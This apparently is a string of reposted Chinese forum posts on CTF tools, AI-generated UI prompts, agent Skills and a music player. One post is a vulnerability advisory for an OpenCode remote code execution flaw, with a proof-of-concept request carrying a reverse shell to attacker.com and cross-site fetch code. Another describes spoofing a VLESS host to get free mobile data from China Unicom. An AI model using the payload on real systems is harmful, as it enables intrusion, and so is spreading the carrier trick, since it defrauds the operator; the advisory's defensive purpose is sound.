    最近在刷题(特别是内存取证和流量分析)的时候,深深地体会到了一句话:“原理决定上限,工具决定效率” 。以前死磕命令行敲半天,后来发现大佬们用自动化工具两分钟就梭哈了,留下了没有技术的眼泪 。

    本着 “开源精神”,先把这段时间做题挖掘到的几个非常好用但可能新手不知道的工具 分享出来,希望能帮到像我一样的入门选手。同时也想借地向论坛的各位大佬求助一下获取工具的渠道

    我的工具分享(取证 / 杂项篇)

    随波逐流 (CTF-Tools)

    做 MISC 和 Crypto 的应该都知道,但这工具真的值得吹爆。

    • 体验 :基本上集成了市面上 99% 的常见编码、加密、隐写工具。什么 Base 全家桶、AES/DES、图片盲水印、文件分离,统统一键搞定。最强的是它的 **“智能识别”** 功能,把乱码丢进去,它能自动尝试解码,省去了去 Python 库里一个个试的时间。

    2. Volatility 的自动化外挂:LovelyMem

    • 推荐理由 :Vol 2.6 虽然经典但命令太长,Vol 3 插件有时候不好配。

    • 体验 :这是一个基于 Vol3 的 Python 脚本,它会自动把 CTF 中最常用的命令(netscan, pslist, filescan, cmdline 等)全跑一遍,然后生成一个整整齐齐的报告文件夹。对于常规题,基本是一键出结果。

    3. 流量分析提取:NetworkMiner

    • 推荐理由 :Wireshark 是神,但用来分离文件有点麻烦。

    • 体验 :如果不涉及深层协议分析,只是想把流量包里的图片、文件、证书提取出来,把你 pcap 文件拖进这个工具,它会自动分类展示。很多 “流量藏图” 的题用这个秒解。

    4. 全能解码:CyberChef

    • 推荐理由 :应该都知道,但必须再推一次。

    • 体验 :最近遇到 GSM 短信解码的题,直接搜 GSM Decode 就能解,比写 Python 脚本快多了。
      虽然搜集了上面这些,但我发现我的 “信息差” 还是很严重。

    1. 关于工具源 :大家平时都是通过什么渠道第一时间发现这些好用的新工具的?是盯着 GitHub 的某些 Topic,还是有什么聚合站?

    2. 关于圈子 :怎么找到高质量的 CTF 交流群或者安全圈子?(现在加的一些群全是水群,很难学到真东西)。

    3. 其他神器 :在流量分析或者逆向方面,大佬们还有没有什么私藏的 “压箱底” 工具可以安利一下?


    📌 转载信息
    原作者:
    techq
    转载时间:
    2026/1/16 17:41:10

    一、背景介绍
    因为最近换了联通卡,发现联通流量特别不经用,虽然看着有 100G,但是半个月不到就完了。所以只能搞一些骚操作了
    这个就是以前的免流,效果各地区不一样,我这边重庆效果挺好。因为我的手机是 IOS,所以跳点挺高(推测是因为 IPV6 导致),所以标题给了一个省流
    二、实现途径
    在 VLESS 中,通过修改 HOST 地址为 pull.free.video.10010.com,走联通的公免流量达到免流效果(客户端和服务器都要修改,有些机场支持自定义 host)。


    有国内服务器的可以上国内服务器,这样日常体验上基本无感。我没有国内服务器,只有通过联通办理的家宽(有公网 IP)来搭建 V2 服务器,日常使用上也是没什么差异。
    V2 上还可以做分流操作,免流 + 翻墙一站式解决。
    附上一个效果图


    PS: 各位多点点赞让我赚点 LDC 呀


    📌 转载信息
    原作者:
    revivable3066
    转载时间:
    2026/1/16 17:40:43

    啥叫 UI 的 AI 味?

    让我们先给 AI 一个 “正常产品经理 / 设计需求文档级别” 的需求描述,不做人为干预(让他自由发挥一个)
    需求提示词(GPT 生成):

    然后我们分别交给 gemini-3-pro-preview,claude-opus4.5,gpt-5.2-codex-high
    以下是养蛊的过程:

    上图!

    各个模型完全不加任何 UI 样式要求版本:

    Claude-opus-4-5、


    gemini-3-pro-preview



    gpt-5.2-codex-high





    在不加任何限制词的情况下,AI 生成 UI 时暴露出的典型「AI 味」

    1. 渐变色本身不是问题,但几乎一定会被用错场景

    蓝紫渐变色(tailwindcss 默认设置)还有各种各样的渐变色乱用


    这是一种很安全的蓝 / 蓝紫配色上,看起来不难看(但显然有点审美疲劳了已经)

    AI 非常喜欢用渐变色来 “兜底视觉效果”,渐变色本来咋用都没啥问题的,可是老是把鲜艳的渐变色直接填充式用在大面积容器、主背景或卡片主体上,你这…。结果就是界面第一眼好看,但信息边界模糊,主次不清。看久了还有点烦躁。

    2. 渐变再进一步叠加光泽和玻璃拟态,UI 经常搞这种莫名其妙的 “假高级”

    你想:
    渐变色 + 高透明度 + 模糊背景 + 发光边缘
    界面会迅速变成展示页或概念稿风格。
    这玩意,emmm 怎么说呢
    虽然我不是啥守旧派,但是架不住啥页面都这个德行

    3. 阴影被当作装饰,而不是层级工具

    AI 生成的 UI 里,阴影我甚至觉得是在乱用,但又没靠这玩意儿区分明确的层级职责。不同卡片、弹层、操作区使用相同强度和样式的阴影,导致 “所有东西都在浮起”,这效果叫啥来着?
    算了,反正就是实际上看着很别扭

    4. 卡片边界过弱,依赖背景和阴影勉强区分内容

    上面说到了阴影,然后也跟这个情况有关,边界太弱了,AI 搞的界面里面,卡片要么使用极浅的边框要么完全没有边框,只靠背景色差或阴影与页面区分。我偶尔搞个白色或浅灰背景下跟我带着眼镜在大冷天吃拉面一样
    我是真看不清,内容混在一起,都不用说阅读疲劳的问题了
    你这玩意儿已经伤害我的眼睛了

    5. 纯白卡片被大量使用,页面整体显得 “轻而薄” 还散装

    上面说了卡片,不只是单个卡片有问题,AI 生成的基本上都是一堆的散装卡片。
    尤其是使用纯白背景的卡片。
    只要你生成的时候需要一个 “干净、现代” 的样式,这绝对是一写一堆,拉的到处都是
    纯白卡片一旦数量增多,就会显得缺乏质感和层次,页面整体像一张尚未完成填充的线框稿。

    而且页面利用效率有问题,就是有些页面第一眼很 “干净”,但第二眼发现内容其实很少
    卡片很大、留白很多、排版很松,看着舒服,但是你仔细看会发现屏幕被浪费得非常严重,更像展示页而不是能用的工具,这点我觉得 Claude 和 GPT 写的还是行的,东西至少不少。

    6. 装饰性细节被平均分配,导致没有视觉节奏(这个观点是 GPT 帮我总结的,我实在不知道咋描述)

    小渐变块、色条、图标背景、装饰点缀被均匀地撒在页面各处,每个模块都想 “精致一点”,但没有任何地方真正承担视觉焦点。最终页面没有节奏,只有装饰堆积。
    人话:“这些莫名其妙的小组件,丢这些地方干什么??用么没什么用,放着嘛多余,删了嘛又觉得缺点东西”

    7. Emoji 或偏卡通风格图标被当作功能图标使用(这个是我最不能忍的)

    AI 生成的 UI 只要你不要求,emoji 或拟物感较强的图标会被直接用于功能入口。
    讲真的,这玩意儿我也就是发个帖子发个消息会加
    甚至我都不会用那些很有年代感的 emoji

    8. 正常用图标,图标风格也会混杂,缺乏统一的视觉语言

    即便不用 emoji,AI 也经常在同一界面中混用线性、填充、双色甚至插画风格的图标。

    单个看都你不会觉得有啥问题的,放在一起就不行了。

    9. 为了显得 “高级”,过度叠加多种视觉效果

    渐变、阴影、圆角、描边、模糊、透明度同时出现。
    第一眼惊艳,第二眼疲劳,第三眼开始觉得乱。

    10. 整体视觉看起来完整,但缺乏真实使用感

    这些 UI 看起来像是 “已经设计完成的后台”,但更像展示用的样例界面。
    看着是 “做完了”,但真点两下就会觉得是 “没开始”。

    人话总结:

    AI 生成 UI 的最大问题不是用了什么效果,而是它不知道什么时候该不用这些效果。反正你也没说不能用,那直接用了好了

    那我是从什么时候开始写「限制词」的?

    其实一开始我也没想过要 “限制” AI,我个人是真没啥艺术细胞
    毕竟 AI 画出来的 UI 第一眼都挺好看,说实话比不少人自己糊的还顺眼。

    问题出在第二眼、第三眼、以及真正开始用的时候。

    渐变色越来越多、阴影越来越重、光泽和玻璃拟态开始乱飞,直接开始污染我幼小的心灵,
    然后接着图标开始不讲武德地混风格,
    emoji 开始混进功能入口里。

    这些东西单独看都不算错
    (蛐蛐一下:md, 其实单看我都觉得错)

    当这个 UI 瞅着开始不再像一个 “被长期使用的工具”,更像一个… 像一个小红书水文

    更 TMD 要命的是:这些问题反而是 “稳定复现” 的

    其实用久了就会发现一个鬼故事:

    • 换模型也好
    • 换需求也好
    • 换业务类型也好

    只要不加约束,这些 AI 味几乎必定会出现。

    这就说明问题不在某一个模型,
    而在于 ——
    这是当前模型默认理解里的 “好 UI”。

    他把他知道的最好的东西都给你了,你还能怎么样?


    所以我开始反着来:不再告诉它我要什么,而是直接告诉它 “不能干什么”

    从那之后,我写 UI 相关 Prompt 的方式彻底变了:

    • 都不用一上来写设计原则
    • 也不用写 “高级”“现代”“好看”
    • 而是先把这些 稳定复现的 AI 味,一条一条禁掉

    比如:

    • 你老爱用渐变?那我就先说别用
    • 你老爱上光泽和玻璃?先禁
    • 你老爱用 emoji 当图标?直接点名不许
    • 你老爱堆卡片?那我就先卡你

    不是我对这些效果有意见,而是它们在工具 UI 里出现得太频繁了。

    好吧我就是有意见


    那问题来了:如果我把这些已知的 AI 味禁掉,UI 会变成什么样?

    接下来我做了一个对照实验。

    不换需求、不换页面、不换模型,
    只在 Prompt 里明确禁止前面提到的那些 “稳定复现的 AI 味”。

    不追求完美,也不追求设计感,

    UI 会不会比之前的更像一个印象里面的 UI?

    对照实验:只靠「禁止」,UI 能变成什么样?

    二次养蛊开始:


    追加的 prompt 很简单:

    下面的修改是在【你刚刚生成的 UI 页面基础上进行】,
    请保持页面结构、信息架构和功能不变,
    只对视觉样式和表现方式进行调整。
    
    
    请注意:
    - 不要重新设计页面结构 - 不要新增或删除功能模块 - 不要改变布局层级或信息顺序 - 不要重新组织页面内容
    
    
    在本次修改中,请明确禁止以下视觉表现:
    
    - 禁止使用蓝紫渐变色及类似风格的渐变 - 禁止使用玻璃拟态、光泽、高透明模糊背景 - 禁止将 emoji 作为功能图标或装饰元素 - 禁止大面积纯白卡片堆叠 - 禁止无实际信息意义的装饰性组件
    
    
    你可以:
    - 使用纯色或低饱和背景色 - 使用统一风格的 SVG 图标 - 使用适度阴影建立层级关系 - 使用少量强调色突出关键操作
    
    
    目标不是追求视觉冲击,
    而是让界面更接近一个会被长期使用的工具型 UI。
    

    ① 明确这是「基于现有页面的修改」
    ② 明确「不允许的行为」(禁止重构,先不让彻底重构)
    ③ 列出「禁止项」(就是刚才咱们总结的 AI 味)
    ④ 给 “最低限度的自由空间”(防止他钻牛角尖),也就是防止 AI 因为被禁太多而做出 “难看 UI”

    上图!

    各个模型加上 UI 禁止项的生成版本:

    Claude-opus-4-5


    gemini-3-pro-preview


    gpt-5.2-codex-high





    这次养蛊大家都有变化,不过 GPT 这次是完胜的,这 UI 比剩下的两个更好

    原因是因为第一次版本 gpt 的就比另外俩打版打的好

    接下来我允许:

    重新设计页面结构
    新增或删除功能模块
    改变布局层级或信息顺序
    重新组织页面内容
    

    也就是:

    进入「三次养蛊:在去 AI 味前提下,让模型开始真正设计」

    使用前提
    已经做过「禁止 AI 味」的一轮
    现在要:在这些禁止条件仍然生效的前提下,允许 AI 放开重构
    这次的 prompt 是:

    现在开始第三次生成。
    
    在上一轮中,你已经基于原页面,
    在明确禁止部分视觉表现的前提下完成了一版 UI。
    
    在本轮中,你【可以】:
    - 重新设计页面结构 - 新增或删除功能模块 - 调整布局层级和信息顺序 - 重新组织页面内容
    
    但请注意:
    
    这仍然是一个【企业级工具型 UI】,
    用于长期、高频使用,
    不是营销页面、不是展示页、不是概念稿。
    
    在重新设计过程中,以下视觉规则仍然【严格生效】:
    
    - 禁止使用蓝紫渐变色及类似风格的渐变 - 禁止使用玻璃拟态、光泽、高透明模糊背景 - 禁止将 emoji 作为功能图标或装饰元素 - 禁止大面积纯白卡片堆叠 - 禁止无实际信息意义的装饰性组件
    
    你可以:
    - 使用纯色或低饱和背景 - 使用统一风格的 SVG 图标 - 使用适度阴影建立清晰的层级关系 - 使用有限且克制的强调色突出关键操作
    
    目标不是追求视觉冲击或设计感,
    而是设计一个
    「在失去所有廉价高级感之后,仍然成立的工具型 UI」。
    
    请直接输出完整页面方案。
    
    

    梅开三度,养蛊继续

    上图!

    各个模型加上 UI 禁止项但放开手脚的生成版本:

    Claude-opus-4-5

    gemini-3-pro-preview

    gpt-5.2-codex-high

    对比结果就是各自都有升级,gpt 的把界面删的就剩下这一个了,Claude 是直接重写了属于,Gemini 重写的样式是真不错

    前三轮我一直在做一件事:把 AI 的 “默认审美” 压下去。

    但光不难看是不够的,真正的产品 UI 还需要 “厚度” 和 “秩序感”。

    第四次养蛊,我不再单纯限制,

    而是把一些我在真实项目里反复验证过的 “增强 UI 质感的手段” 明确告诉 AI,看它能不能顺着这套逻辑往上走。

    为什么还会有第四次养蛊呢?因为我想给 Claude opus 一个机会

    虽然刚才 Opus 的生成结果都差点意思,实际上我用他已经做了比较不错的 UI 了,一种没正确发挥水平的感觉,gpt 和 gemini 也一样,总觉得没发挥真实水平

    比如下面这个是我昨天刚用 Opus 做的应用的截图:

    第四次养蛊开始:

    开始加一点 “人类设计师才会在意的细节引导”,
    并且要求 AI 把整个系统的页面一次性补齐,
    看他能不能真正把一个产品原型做完整。
    示例 Prompt(原则嘛就是基于刚才那些原则从零彻底开始):

    现在开始一次全新的 UI 生成。
    
    请注意:本次不是在已有结果上修改,
    而是【从零开始设计并实现一个完整的前端 HTML 项目】。
    
    ---
    
    ## 项目目标
    
    设计并实现一个【企业级工具系统 / 会员中心 / 管理后台】,
    面向长期、高频使用的真实用户。
    
    这不是营销页面、不是概念稿、不是组件示例,
    而是一个“看起来就可以继续开发和交付”的前端项目。
    
    ---
    
    ## 交付物要求(非常重要)
    
    你需要输出的是一个【前端项目级结果】,包括:
    
    1. 清晰的项目目录结构说明
    2. 多个页面级 HTML 文件(不是单页)
    3. 拆分的 CSS 文件(统一设计语言)
    4. 拆分的 JS 文件(只处理基础交互)
    
    示例结构(仅作说明,可自行调整):
    - index.html(工作台 / 概览)
    - products.html(功能或套餐页)
    - detail.html(详情页)
    - settings.html(设置页)
    - assets/css/style.css
    - assets/js/app.js
    
    ---
    
    ## 样式与视觉规则(限制项)
    
    在本次生成中,请**明确禁止**以下表现:
    
    - 禁止使用蓝紫渐变色或默认 Tailwind 风格渐变
    - 禁止玻璃拟态、光泽、高透明模糊背景
    - 禁止使用 emoji 作为功能图标或装饰元素
    - 禁止大面积纯白卡片堆叠
    - 禁止无信息意义的装饰性组件
    - 禁止为了“显得高级”而叠加多种视觉效果
    
    ---
    
    ## 视觉风格引导(允许且推荐)
    
    在遵守以上限制的前提下,**推荐使用以下设计方向**:
    
    1. 浅色但非纯白的背景体系(如浅灰、灰白)
    2. 明确的“盒子感”设计:
       - 使用边框、背景、间距建立层级
       - 阴影只作为辅助,不作为主要分层手段
    3. 允许使用“有岗位的花活”,例如:
       - 图标容器样式
       - featured / 推荐模块
       - 状态背景、进度条、徽章
       但这些花活只能出现在关键模块上,不能平均分布
    4. 允许使用低饱和、低对比的层次变化或微渐变,
       仅用于模块内部或状态表达
    5. 图标统一使用线性 SVG 风格,风格保持一致
    6. 页面信息密度以“效率优先”,
       合理利用横向空间,避免单列堆叠
    
    ---
    
    ## 页面与内容要求
    
    - 每个页面都应是“可用页面”,不是占位结构
    - 页面之间需要体现功能差异,但保持统一视觉语言
    - 页面结构、模块组织、信息顺序可自由设计
    - 允许自行决定需要哪些页面和模块,只要合理
    
    ---
    
    ## 最终目标
    
    生成一套:
    
    - 从零设计
    - 项目级结构清晰
    - 视觉上不存在明显 AI 味
    - 同时具备设计感和工具属性
    
    的【企业级工具系统前端 HTML 项目】。
    
    请按“项目级输出”的方式给出结果。
    
    
    

    上图!

    各个模型第四次养蛊生成版本:

    Claude-opus-4-5

    gemini-3-pro-preview

    gpt-5.2-codex-high

    各自有各自的风格,而且我觉得这回真的是哪个模型就生成哪个模型的风格

    结论:还是没找全最合适的降低 AI 味道的限制条件


    📌 转载信息
    原作者:
    mistpeak
    转载时间:
    2026/1/16 16:55:24

    项目简介

    LinMusic 是一个基于 Vue 3 的在线音乐播放器,支持多平台音乐搜索和 PWA 后台播放。
    大家创建的歌单存在 cf 的 D1 中,可以共享(也可以互删歌单 ),所谓的 "一人一首歌" 便捷版。

    在线体验:

    功能特性

    • 多平台搜索(网易云、酷我、QQ 音乐)
    • PWA 支持,可添加到主屏幕
    • 后台播放,锁屏控制
    • 歌词同步显示
    • 自定义歌单管理
    • 多种播放模式
    • 歌曲下载

    技术栈

    • 前端:Vue 3 + TypeScript + Vite + Tailwind CSS
    • 部署:Cloudflare Pages + D1(用梯子加载会快点)
    web 效果


    ios 效果







    项目地址,点个 star 嘛

    项目音乐 api 来源于 https://linux.do/t/topic/1326425
    在此感谢


    📌 转载信息
    原作者:
    Yolon
    转载时间:
    2026/1/16 16:50:49

    基本上需要的功能齐全了

    Antigravity+GemeniCLI 双额度
    原生 Google_Search
    原生大香蕉文生图 图生图

    在 opencode 里可以和 Antigravity 里一样自动调用生图工具制作 / 修改项目需要的图片


    📌 转载信息
    转载时间:
    2026/1/16 16:50:22

    想让 AI 帮你自动清理电脑、分析股票或者发日报?你需要给它编写一个 Skill (技能)

    其实写一个 Skill 并不难,它本质上就是一个配置文件加上一段代码

    本文档将手把手教你如何创建一个标准的 Skill,并避开新手最容易踩的坑。

    一、 YAML 头部元数据 (Frontmatter)

    每个 Skill 的入口文件(通常叫 SKILL.md),由 “身份证” (YAML) 和 “躯干” (文件结构) 组成,最开头都必须有一段被三根短横线 --- 包裹的内容。

    这叫做 YAML Frontmatter (头部元数据)

    通俗地说,这就是给 AI 看的身份证。AI 通过它来知道这个技能叫什么、能干什么。

    1. 一个标准的身份证长这样:

    --- name: system-cleaner description: "清理电脑里的垃圾文件,释放C盘空间" tags: ["清理", "系统", "优化"]
    version: 1.0.0 ---

    2. 这里的每一行代表什么?

    td {white-space:nowrap;border:0.5pt solid #dee0e3;font-size:10pt;font-style:normal;font-weight:normal;vertical-align:middle;word-break:normal;word-wrap:normal;}

    字段类型必填说明
    nameString技能 ID。建议使用 kebab-case (小写短横线),如 git-helper。
    descriptionString核心 Prompt。智能体依靠这句话来理解技能用途。建议包含具体动词(如 "清理"、“生成”)。
    tagsArray关键词列表。用于模糊匹配和分类检索。
    versionString版本号。遵循语义化版本 (Major.Minor.Patch)。

    二、文件夹要怎么放?(目录结构)

    写代码最怕乱。为了以后好维护,建议你按照下面的结构来整理文件。

    这就好比把衣服、裤子和袜子分开放进不同的抽屉,找起来才快。

    推荐的 “三抽屉” 结构:

    my-skill/                  # 你的技能总文件夹
    ├── SKILL.md               # [身份证] 上面写的 YAML 就放这里
    ├── scripts/               # [工具箱] 所有的代码脚本放这里
    │   ├── main.ps1           # 比如 PowerShell 脚本
    │   └── utils.py           # 比如 Python 脚本
    ├── config/                # [设置] 配置文件放这里
    │   └── settings.json      # 比如你想让用户设置“清理哪个盘”,就写在这里
    └── data/                  # [仓库] 存放运行结果
        └── logs/              # 如果有日志,就生成在这里 

    三、 代码实战 (The Code)

    光有配置是不够的,Skill 的灵魂在于代码。

    Skill 的本质是命令行工具 (CLI)。智能体通过命令行调用你的脚本,并读取打印的输出。

    1. 实战演练:编写 “Hello World” Skill

    我们来编写一个简单的 Python 脚本,它接收一个名字参数,并输出问候语。

    1. 脚本代码 (scripts/main.py)

    import argparse
    import sys
    
    # 1. 设置参数解析 (让脚本能听懂 AI 的指令) # AI 会以 `python main.py --name "LO"` 的方式调用
    parser = argparse.ArgumentParser(description="Greeter Skill")
    parser.add_argument("--name", type=str, required=True, help="要问候的名字")
    
    # 2. 解析参数
    args = parser.parse_args()
    
    # 3. 执行逻辑 (这里可以写任何业务逻辑)
    greeting = f"👋 你好,{args.name}!Skill 运行成功!" # 4. 输出结果 (这是 AI 唯一能看到的东西!) # 必须使用 print 输出。AI 会捕获 stdout 作为执行结果。 print(greeting)
    
    1. 进阶技巧:健壮性与反馈

    • 错误处理: AI 看不到报错弹窗。如果出错,必须打印错误信息并以非 0 状态码退出。
    try:
        # 业务逻辑... except Exception as e:
        print(f"❌ 发生错误: {str(e)}")
        sys.exit(1) # 告诉 AI 任务失败 
    • 依赖管理:如果用了第三方库,请在根目录创建 requirements.txt
    1. 核心连接:配置与交互

    你已经建了 config 文件夹,现在教你怎么用它。

    2.1 读取外部配置 (Reading Config)

    不要把参数写死在代码里!用 json 库读取 settings.json

    import json
    import os
    
    # 动态找到 config 文件夹 (不管用户把 Skill 放在哪)
    current_dir = os.path.dirname(os.path.abspath(__file__))
    config_path = os.path.join(current_dir, "..", "config", "settings.json")
    
    # 读取配置
    with open(config_path, "r", encoding="utf-8") as f:
        config = json.load(f)
    
    print(f"✅ 读取到配置: {config}")
    

    2.2 与用户对话 (Interaction)

    有时候需要问用户 “确定吗?”。

    # 1. 打印问题 (AI 会展示给用户) print("❓ 确认执行操作吗?(y/n)")
    
    # 2. 等待输入 (脚本会暂停)
    user_input = input().strip().lower()
    
    if user_input == 'y':
        print("🚀以此执行...")
    else:
        print("🛑 操作取消")
    

    四、 新手避坑指南 (千万别踩这些雷!)

    YAML 这种格式虽然看起来简单,但它脾气很怪。很多新手写代码一次过,却在 YAML 上卡半天。

    1. 它是 “空格控”,严禁使用 Tab 键!

    YAML 依靠缩进来分层级。

    • 雷区:千万不要用键盘左上角的 Tab 键来缩进!

    • 正确做法:老老实实按 空格键。一般按 2 下或 4 下空格。

    1. 冒号后面必须有空格

    这是最容易被忽略的错误。

    • 错误写法:name:my-skill (冒号后面紧挨着字)

    • 正确写法:name: my-skill (冒号后面加了个空格)

    1. 还有什么要注意的?

    • 路径别写死 (No Absolute Paths):

      • 不要在代码里写 D:\我的项目\scripts 这种绝对路径。别人的电脑可能只有 C 盘。

        • 建议:使用 “相对路径”。也就是告诉程序 “就在当前文件夹的下一级找”。
    • 幂等性 (Idempotency):

      • 脚本应支持重复运行。比如创建文件夹前,先检查它是否已经存在。
    • 自测 (Self-Test):

      • 在提交给 AI 之前,先自己在终端里跑一遍命令:python scripts/main.py --name "Test",确保没有报错。

    总结

    写 Skill 其实就三句话:

    1. 写好 YAML 身份证,注意冒号后要空格

    2. 把代码和配置分开放,保持目录整洁

    3. 代码里多打印进度提示,方便 AI 理解


    📌 转载信息
    原作者:
    Y_yuHou
    转载时间:
    2026/1/16 16:50:03

    原理跟手动进任务栏调整一致,已经用了一段时间了,没有封过号。
    操作方式:进入三角洲(其余游戏同理)后,双击 SGuardLimiter.ps1 或右键选择 PowerShell 运行,会自动弹出管理员确认,选择是就行。

    代码

    SGuardLimiter.ps1.zip (777 字节)


    📌 转载信息
    原作者:
    Longbin
    转载时间:
    2026/1/16 16:49:42

    漏洞告警:OpenCode 远程代码执行漏洞 (CVE-2026-22812)

    • 漏洞名称:OpenCode 自动启动未授权 HTTP 服务器导致 RCE
    • 漏洞编号:CVE-2026-22812 / QVD-2026-3051
    • 影响版本:OpenCode < 1.0.216
    • 修复版本:OpenCode 1.0.216 (已修复)
    • 风险评级高危 (CVSS 3.1: 8.8)


    OpenCode 是一款流行的开源 AI 编码代理。该漏洞的成因在于其内部架构存在 “默认不安全” 的设计逻辑:

    1. 未授权 API 服务:软件启动后会默认在本地开启一个 HTTP 端口用于通讯(常见端口为 4096),但该服务没有任何身份验证机制(无 Token,无 API Key)。
    2. 宽容的 CORS 策略:该本地服务器配置了极其宽松的跨域资源共享(CORS)策略,允许任何域名的网页发起跨域请求。

    攻击向量:

    • 本地触发:本机任何恶意程序可直接通过该端口执行指令。
    • 跨站攻击 (CORS 触发):受害者在运行 OpenCode 时,只需在浏览器中打开攻击者构造的恶意网页,网页中的 JS 脚本即可越权调用本地 API 执行任意系统命令。
    攻击向量受影响版本状态技术说明
    任意网站 RCE< v1.0.216已修复通过宽容的 CORS 策略,恶意网页可跨域执行代码。
    本地进程执行< v1.1.10缓解任何本地进程可通过 HTTP 接口执行指令。
    本地网页执行< v1.1.10缓解本地 HTML 文件可通过 API 接口触发 RCE。
    服务器模式风险所有版本未修复启用服务器模式后,本地进程 / 网页仍具执行权限。
    隐蔽运行风险所有版本未修复服务器运行时无任何 UI 提示,用户无法感知风险。
    mDNS 局域网风险所有版本未修复使用 --mdns 时绑定到 0.0.0.0,局域网内机器可控。
    子域名信任风险所有版本未修复*.opencode.ai 下的任何页面均具代码执行权限。
    供应链 / XSS 风险所有版本未修复opencode.ai 的 XSS 或域名失陷将导致所有用户受影响。


    警告:以下内容仅供合规安全自查使用,严禁非法用途。

    POC, 仅供技术研究,切勿私自改造为 EXP

    1. 核心攻击请求 (HTTP 原始载荷)

    攻击者向本地 API 端口发送 POST 请求执行反弹 Shell 指令:

    POST /api/execute HTTP/1.1
    Host: 127.0.0.1:4096
    Content-Type: application/json
    Origin: http://evil-attacker.com
    
    {
      "command": "bash -i >& /dev/tcp/attacker.com/4444 0>&1"
    }
    

    2. 跨站 JavaScript 利用 (Web 侧)

    诱导受害者点击后,在后台静默执行的脚本:

    fetch("http://127.0.0.1:4096/api/execute", {
        method: "POST",
        mode: "cors",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
            "command": "calc.exe"
        })
    });
    


    • 端口监听:立即排查本地系统中是否存在监听 4096 或类似端口的 OpenCode 相关进程。
    • 流量审计
      • 关注所有目的地为 127.0.0.1 且包含 commandexecute 字段的 POST 请求。
      • 重点检查 HTTP 请求头中的 Origin 字段是否包含非受信任的外部域名。
    • 权限检查:确认 OpenCode 是否以 Root 或 Administrator 权限运行,这决定了 RCE 造成的损害级别。


    1. 强制升级:请确保 OpenCode 升级至 1.0.216 或更高版本。新版本增加了鉴权令牌并收紧了 CORS。
    2. 防火墙策略:在未升级前,通过系统防火墙(如 iptables 或 Windows Defender)阻断该端口的一切非必要入站流量。
    3. 安全习惯:在使用本地 AI 代理工具时,避免在同一浏览器 Session 下浏览高风险网站。


    报告日期


    📌 转载信息
    原作者:
    ddb
    转载时间:
    2026/1/16 16:49:28

    Skills 的底层逻辑:从提示词到架构模式

    最近 Skills 功能上线了,看到大家都在分享使用教程。

    我就不凑热闹发教程了,今天给各位大佬分享一点更底层的东西:Skills 的本质到底是什么?

    学不会?没事,学中干,干中学各位,没必要非要知道原理,只要会用即可!!!

    下面我用很简答易懂的话讲解了,还不懂就评论问吧!!!

    什么是 Skills?

    Skills 的本质:Agent 时代的通用架构模式

    Skills 不属于任何模型,不属于 MCP,也不属于任何一家科技巨头。

    它是 Agentic AI ( 智能体 AI) 发展过程中诞生的一种通用设计 模式 (Design Pattern)

    抛开所有无用的内容,来看看具体实现,Skills 的核心逻辑其实很简单,可以用下面这个永恒的公式概括:

    Skills = System Prompt (系统提示词) + Trigger (自动触发器) + Executable (可执行文件)

    1. 手动模式 vs 自动模式

    为了理解 Skills 的适用性,我们回溯到人与 AI 交互的最基本形式。

    比如当你想要 AI 帮你写出一段高质量代码时,你通常可能会输入这样一段话:

    “你现在是一个资深 Python 架构师,精通设计模式和性能优化。请帮我审查这段代码…”

    在这个瞬间,你所输入的对话,其实就是在手动执行一个 Skill。

    你通过手动输入,给 AI 设定了角色 (Role)上下文 (Context)

    所谓的 Skills,就是把这个过程 “代码化” 或 “自动化” 了。

    无论是在 Gemini CLI、Claude Code 还是现在的这些 IDE 中,逻辑都是一样的:

    用户将这段 “资深 Python 架构师” 的设定(Prompt)封装成一个独立的模块。

    系统告诉模型:“如果用户问代码问题,你就自动加载这个模块,不需要用户每次都手敲。”

    2. 为什么系统提示词 (System Prompt) 也能调用 Skills?

    你可能会问:模型是怎么知道我有这些 Skills 的?

    这就涉及到了 System Prompt 的隐形机制

    在对话开始之前,IDE 已经在后台偷偷做了一件事:它把所有可用 Skills 的名字和描述,写进了发给模型的第一条系统提示词里。

    这就像是考试前,老师(IDE)给学生(模型)塞了一张小纸条

    “考试须知:如果你遇到不懂的代码题,你可以申请查阅‘Python 架构师手册’(即调用 skill: python-architect)。”

    正因为系统提示词里预埋了这些指令,模型才能在遇到问题时,理直气壮地 “调用” Skills。

    所以,System Prompt 不仅是 Skills 的载体,更是 Skills 的 “目录” 和 “导航”。这也是为什么我在 IDE 不支持的情况下能够将 skills 实现,很早就写出提示词来实现了 skills 这个功能

    3. 进阶:Skill 包的解剖学 (Scripts & Assets)

    很多高级 Skill(比如 ui-ux-pro-max-skill)不仅仅是一个 Markdown 文件,它往往是一个文件夹

    一个完整的 Skill 包结构通常是这样的:

    my-complex-skill/
    ├── SKILL.md          # 大脑:提示词和指令
    ├── scripts/          # 手脚:Python/Node.js 脚本
    │   ├── audit.py
    │   └── generate.js
    └── assets/           # 素材:图片、模板
        └── logo.png
    

    当 AI 决定调用这个 Skill 时,它不仅会读取 SKILL.md,还会获得执行 scripts/ 下脚本的权限。 比如,AI 可能会运行 python scripts/audit.py 来扫描你的代码,而不是自己瞎猜。

    4. 环境悖论:没有 Node 环境会怎样?

    这是一个非常现实的问题:

    “如果我在 Skills 中设定了调用 Node.js 脚本,但我电脑上没有安装 Node,Skills 会自动下载吗?”

    答案是:通常不会。

    Skills 是运行在你本地环境 (Local Environment) 中的。

    • Skill 就像是一张游戏光盘。

    • 你的电脑 就像是游戏机。

    • Node/Python 环境 就像是操作系统。

    如果你买了游戏光盘(下载了 Skill),但没买游戏机(没装 Node),游戏是跑不起来的。 Agent 尝试运行 node script.js 时,会直接收到系统的报错:command not found: node

    虽然现在的 Agent 很聪明,它可能会检测到报错,然后建议你:“检测到未安装 Node.js,请先安装。”

    但它通常不敢(也不应该)擅自帮你下载安装这种系统级的 Runtime,因为这涉及巨大的安全风险和兼容性问题。 如何保证能够让 skills 实现下载 node 环境呢?

    这里有一个专业的术语,叫 “Runtime Bootstrapping” (运行时引导)

    你不应该简单地说 “下载 Node”,而应该在 Skill 的定义中加入一段 “自愈式 (Self-Healing)” 的指令。

    专业的话术建议:

    “Prerequisite Check & Environment Setup” (前置检查与环境搭建)

    “在执行任何脚本之前,请先运行 node -v 验证运行时环境。如果环境缺失,请不要直接报错,而是根据用户的操作系统(Windows/macOS/Linux),生成对应的安装命令(如 winget install brew install),并引导用户完成安装。”

    这样做,你的 Skill 就从一个 “会报错的脚本”,变成了一个 “会照顾用户的智能体”。

    这也是为什么 ui-ux-pro-max-skill 这个 skills 会有那么多人是使用,因为人在 skills 中照顾到了所有的群体,没有环境,那我就下环境,可以看这个 skills 来实现自己的 skills。

